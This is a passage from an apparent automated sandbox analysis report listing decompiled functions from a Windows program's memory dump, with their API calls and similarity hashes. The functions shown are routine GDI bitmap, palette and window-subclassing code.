								_v21 = 1;
								_v92 = 0;
								_t117 = E004239CC(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x42424e);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 004240B7
GetDC.USER32(00000000), ref: 004240E5
CreateCompatibleDC.GDI32(?), ref: 004240F6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00424111
SelectObject.GDI32(?,00000000), ref: 0042412B
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042414D
CreateCompatibleDC.GDI32(?), ref: 0042415B
SelectObject.GDI32(00000000,00000000), ref: 004241A3
SelectPalette.GDI32(00000000,?,00000000), ref: 004241B6
RealizePalette.GDI32(00000000), ref: 004241BF
SelectPalette.GDI32(?,?,00000000), ref: 004241CB
RealizePalette.GDI32(?), ref: 004241D4
SetBkColor.GDI32(00000000,00000000), ref: 004241DE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00424202
SetBkColor.GDI32(00000000,00000000), ref: 0042420C
SelectObject.GDI32(00000000,00000000), ref: 0042421F
DeleteObject.GDI32(00000000), ref: 0042422B
DeleteDC.GDI32(00000000), ref: 00424241
SelectObject.GDI32(?,00000000), ref: 0042425C
DeleteDC.GDI32(00000000), ref: 00424278
ReleaseDC.USER32 ref: 00424289

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction ID: efd02d1a875929a6837f3824ff537185af59d8eb039b0b63219b306ede86c4ac
Opcode Fuzzy Hash: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction Fuzzy Hash: F7516E71F04324ABDB10EBEADC45FAEB7FCEB48704F51446AB614F7281C67899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00424E90, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00424E90(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402754(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x4253ad);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x425380);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004035AC(1);
						if(_a4 == 0) {
							E00402EF0( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416B50(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t261 = _v64;
					E00402EF0(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E004209DC();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E00416AE0(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E00420C6C( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E00416AE0(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E00420C8C( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00420F34(_v32);
				}
				_v16 = E00420AFC(GetDC(0));
				_push(_t333);
				_push(0x4252fb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x476514 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B30C(_t255, _t267, _t327, _t331);
							} else {
								E004209DC();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E00416AE0(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x4252ca;
						 *[fs:eax] = _t300;
						_push(0x425302);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402754(_t331);
					_push(_t333);
					_push(0x425263);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E00416AE0(_v12, _t331, _v24);
					_v20 = E00420AFC(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E004211EC(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x425237);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B30C(_t255, _t273, _t327, _t331);
						} else {
							E004209DC();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x42523e);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00424e90
0x00424e91
0x00424e93
0x00424e9c
0x00424e9e
0x00424ea1
0x00424ea6
0x00424eab
0x00424eb0
0x00424ec0
0x00424ec7
0x00424ecf
0x00424ed1
0x00424ed1
0x00424ee8
0x00424eee
0x00424ef3
0x00424ef4
0x00424ef9
0x00424efc
0x00424f01
0x00424f02
0x00424f07
0x00424f0a
0x00424f11
0x00424f70
0x00424f73
0x00424f79
0x00424f7f
0x00424f99
0x00424fa0
0x00424faf
0x00424fb4
0x00424fc2
0x00424fce
0x00424fce
0x00424fde
0x00424fee
0x00425002
0x00425011
0x00425023
0x00425029
0x00425029
0x00424f13
0x00424f23
0x00424f26
0x00424f32
0x00424f37
0x00424f3d
0x00424f44
0x00424f4b
0x00424f53
0x00424f57
0x00424f57
0x0042502c
0x00425032
0x0042503a
0x00425042
0x00425044
0x00425044
0x0042504d
0x0042504f
0x00425057
0x00425063
0x00425070
0x00425075
0x00425079
0x00425079
0x00425063
0x00425057
0x00425080
0x0042508b
0x0042508b
0x00425091
0x0042509d
0x004250a6
0x004250b8
0x004250be
0x004250c0
0x004250cc
0x004250d6
0x004250db
0x004250de
0x004250de
0x004250e1
0x004250e6
0x004250e8
0x004250e8
0x004250ee
0x004250f3
0x004250f3
0x00425104
0x00425109
0x0042510a
0x0042510f
0x00425112
0x00425118
0x0042511d
0x0042512b
0x00425281
0x00425288
0x00425297
0x004252a0
0x00425299
0x00425299
0x00425299
0x00425297
0x004252a7
0x004252ad
0x004252b0
0x004252bb
0x004252c2
0x004252c5
0x004252e4
0x004252e7
0x004252ea
0x004252fa
0x00000000
0x00000000
0x00000000
0x00425131
0x00425131
0x00425133
0x0042513d
0x00425142
0x00425143
0x00425148
0x0042514b
0x00425151
0x00425156
0x00425169
0x00425183
0x00425188
0x0042518e
0x00425193
0x00425195
0x004251a1
0x004251b3
0x004251ba
0x004251ba
0x004251c1
0x004251c2
0x004251c7
0x004251ca
0x004251e3
0x004251ea
0x004251f3
0x004251fc
0x004251f5
0x004251f5
0x004251f5
0x004251f3
0x00425203
0x00425206
0x00425209
0x00425212
0x0042521e
0x0042521e
0x00425236
0x00425236

APIs

GetDC.USER32(00000000), ref: 004250FA
CreateCompatibleDC.GDI32(00000001), ref: 0042515F
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00425174
SelectObject.GDI32(?,00000000), ref: 0042517E
SelectPalette.GDI32(?,?,00000000), ref: 004251AE
RealizePalette.GDI32(?), ref: 004251BA
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 004251DE
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425237,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004251EC
SelectPalette.GDI32(?,00000000,000000FF), ref: 0042521E
SelectObject.GDI32(?,?), ref: 0042522B
DeleteObject.GDI32(00000000), ref: 00425231

Strings

(, xrefs: 00425049
,#A, xrefs: 00424F8F
BM, xrefs: 00424FB4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($,#A$BM
API String ID: 2831685396-1417865810
Opcode ID: 5a9aa16d97d8b47d9dd4312df1e32f25e663ee293d7b64bdf73fe92d951baa9f
Instruction ID: a0086a3a9348105b291f8282c459510307930b83bd3d865a48499880c105f012
Opcode Fuzzy Hash: 5a9aa16d97d8b47d9dd4312df1e32f25e663ee293d7b64bdf73fe92d951baa9f
Instruction Fuzzy Hash: C8D14B70B002189FDF04DFA9D885AAEBBF5FF49304F51846AE905EB391D7789840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004749C4, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004749C4(int __eax, void* __eflags) {
				int _v8;
				char* _t87;
				int _t89;
				long _t92;
				int _t117;
				struct HWND__* _t146;
				void* _t149;
				void* _t150;
				struct HWND__* _t151;
				intOrPtr _t162;
				struct HWND__* _t168;
				void* _t170;
				struct HWND__* _t171;
				struct HWND__* _t172;
				intOrPtr _t174;
				intOrPtr _t176;

				_t174 = _t176;
				_v8 = __eax;
				E0042C188(_v8);
				_t146 = GetWindow(E0043C1F4(_v8), 5);
				 *(_v8 + 0x248) = _t146;
				_t168 = _t146;
				 *(_v8 + 0x268) = _t168;
				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
					_t151 = GetWindow(GetWindow(E0043C1F4(_v8), 5), 5);
					if(_t151 != 0) {
						if( *((char*)(_v8 + 0x281)) == 1) {
							_t172 = _t151;
							 *(_v8 + 0x244) = _t172;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t151 = GetWindow(_t151, 2);
						}
						_t171 = _t151;
						 *(_v8 + 0x240) = _t171;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t87 =  *0x491050; // 0x492b70
				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
					_t89 = _v8;
					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
						_t92 = E00442A04( *((intOrPtr*)(_v8 + 0x278)));
						_t89 = PostMessageA(E0043C1F4(_v8), 0x402, 0, _t92);
					}
					return _t89;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
					 *((char*)(_v8 + 0x280)) = 1;
					 *[fs:eax] = _t176;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x474bc6, _t174);
					_t149 = E004151B8( *((intOrPtr*)(_v8 + 0x284))) - 1;
					if(_t149 >= 0) {
						_t150 = _t149 + 1;
						_t170 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
							_t170 = _t170 + 1;
							_t150 = _t150 - 1;
						} while (_t150 != 0);
					}
					E0040BAD8(_v8 + 0x27c);
					E00435C68(_v8);
					_pop(_t162);
					 *[fs:eax] = _t162;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x474bcd);
					_t117 = _v8;
					 *((char*)(_t117 + 0x280)) = 0;
					return _t117;
				}
			}

APIs

Part of subcall function 0042C188: SendMessageA.USER32(00000000,00000141,?,00000000), ref: 0042C1A8

GetWindow.USER32(00000000,00000005), ref: 004749E0
GetWindowLongA.USER32 ref: 004749FE
SetWindowLongA.USER32 ref: 00474A22
GetWindow.USER32(00000000,00000005), ref: 00474A45
GetWindow.USER32(00000000,00000000), ref: 00474A4B
GetWindowLongA.USER32 ref: 00474A74
SetWindowLongA.USER32 ref: 00474A98
GetWindow.USER32(00000000,00000002), ref: 00474AA0
GetWindowLongA.USER32 ref: 00474AB5
SetWindowLongA.USER32 ref: 00474AD9
SendMessageA.USER32(00000000,000000D3,00000003,00000000), ref: 00474B07

Strings

p+I, xrefs: 00474ADE

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$MessageSend
String ID: p+I
API String ID: 1593136606-3535844639
Opcode ID: 2b1c59f87e6d7c0c28170d5b3a0ee90902b3f0ceb1caab95805b7b657a5b4690
Instruction ID: 8fdb1834a48dc50901c4802ba14f808ad23408d3c31b557c86e1ba50301c72a9
Opcode Fuzzy Hash: 2b1c59f87e6d7c0c28170d5b3a0ee90902b3f0ceb1caab95805b7b657a5b4690
Instruction Fuzzy Hash: 0F61E974A04105EFDB10DB99C989FA977F4EB49314F2542E5F418AB3A2CB74AE00DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00424598, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424598(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x4247e4; // 0xf
				E004207D8(_v8, __ecx, _t173);
				E00424C08(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L4:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L4;
					}
				}
				if(_t82 == 0) {
					if(E00424924(_t165) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BA8(_t165, _t166);
				}
				_t89 = E00424868(_t165);
				_t177 =  *0x4247e4; // 0xf
				E004207D8(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424868(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E004247DC);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420AFC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CA0( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424868(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247af);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}

0x00424598
0x00424599
0x0042459b
0x004245a1
0x004245a3
0x004245a6
0x004245a8
0x004245ab
0x004245b4
0x004245bb
0x004245c2
0x004245c5
0x004245c9
0x004245ce
0x004245df
0x004245e9
0x004245ee
0x004245ee
0x00424600
0x0042460a
0x0042460f
0x00424613
0x00424618
0x00424629
0x00424629
0x0042461a
0x0042461e
0x00424627
0x0042462d
0x00000000
0x00000000
0x00000000
0x00424627
0x00424631
0x00424674
0x00424681
0x00424681
0x00424633
0x0042463e
0x0042464c
0x00424664
0x00424664
0x00424688
0x00424689
0x0042468e
0x00424691
0x0042469d
0x004246a1
0x004246a1
0x004246a8
0x004246ad
0x004246b3
0x004246c1
0x004247aa
0x004247b1
0x004247b4
0x004247b7
0x004247c0
0x00000000
0x004247cf
0x004247d4
0x004246c7
0x004246c9
0x004246ce
0x004246d3
0x004246d4
0x004246d9
0x004246dc
0x004246eb
0x004246fb
0x00424735
0x0042473a
0x0042473c
0x0042473f
0x00424742
0x0042474b
0x00424755
0x00424755
0x0042475e
0x00000000
0x00424764
0x00424769
0x00424769

APIs

Part of subcall function 00424C08: GetDC.USER32(00000000), ref: 00424C5E
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: ReleaseDC.USER32 ref: 00424CAC

SelectPalette.GDI32(?,?,000000FF), ref: 004245DA
RealizePalette.GDI32(?), ref: 004245E9
GetDeviceCaps.GDI32(?,0000000C), ref: 004245FB
GetDeviceCaps.GDI32(?,0000000E), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
SetStretchBltMode.GDI32(00000000,00000003), ref: 00424681
CreateCompatibleDC.GDI32(00000000), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6
SelectObject.GDI32(?,00000000), ref: 00424755
DeleteDC.GDI32(00000000), ref: 00424764

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction ID: d8dca1dc3148269436b121e867a8f998dbdffe145855f72674f5f49c2dbe5de2
Opcode Fuzzy Hash: fe7d686b3323d8b8b154543582734b889aafd599eed5243266c7d830b2acc61e
Instruction Fuzzy Hash: EE718AB5B00215AFCB40EFA9C985F5EB7F8EB89304F51856AB508E7281C738ED00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420B0C, Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00420B0C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x420c5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E00420A54(_t77);
					}
					_push(_t93);
					_push(0x420bc9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E00420A54(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x420bd0);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(E00420C61);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x00420b0d
0x00420b0f
0x00420b1a
0x00420b1b
0x00420b1c
0x00420b1e
0x00420b28
0x00420b32
0x00420b37
0x00420b38
0x00420b3d
0x00420b40
0x00420b4d
0x00420b54
0x00420b75
0x00420b7c
0x00420b7e
0x00420b7e
0x00420b85
0x00420b86
0x00420b8b
0x00420b8e
0x00420ba2
0x00420ba9
0x00420bab
0x00420bab
0x00420bb2
0x00420bb5
0x00420bb8
0x00420bc8
0x00420b56
0x00420b69
0x00420bd4
0x00420be3
0x00420bf2
0x00420c19
0x00420c20
0x00420c27
0x00420c27
0x00420c2e
0x00420c35
0x00420c35
0x00420c2e
0x00420c3c
0x00420c3f
0x00420c42
0x00420c4b
0x00420c59
0x00420c59

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00420B23
CreateCompatibleDC.GDI32(00000000), ref: 00420B2D
GetObjectA.GDI32(?,00000018,?), ref: 00420B4D
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00420B64
GetDC.USER32(00000000), ref: 00420B70
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00420B9D
ReleaseDC.USER32 ref: 00420BC3
SelectObject.GDI32(?,?), ref: 00420BDE
SelectObject.GDI32(?,00000000), ref: 00420BED
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C19
SelectObject.GDI32(?,00000000), ref: 00420C27
SelectObject.GDI32(?,00000000), ref: 00420C35
DeleteDC.GDI32(?), ref: 00420C4B
DeleteDC.GDI32(?), ref: 00420C54

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
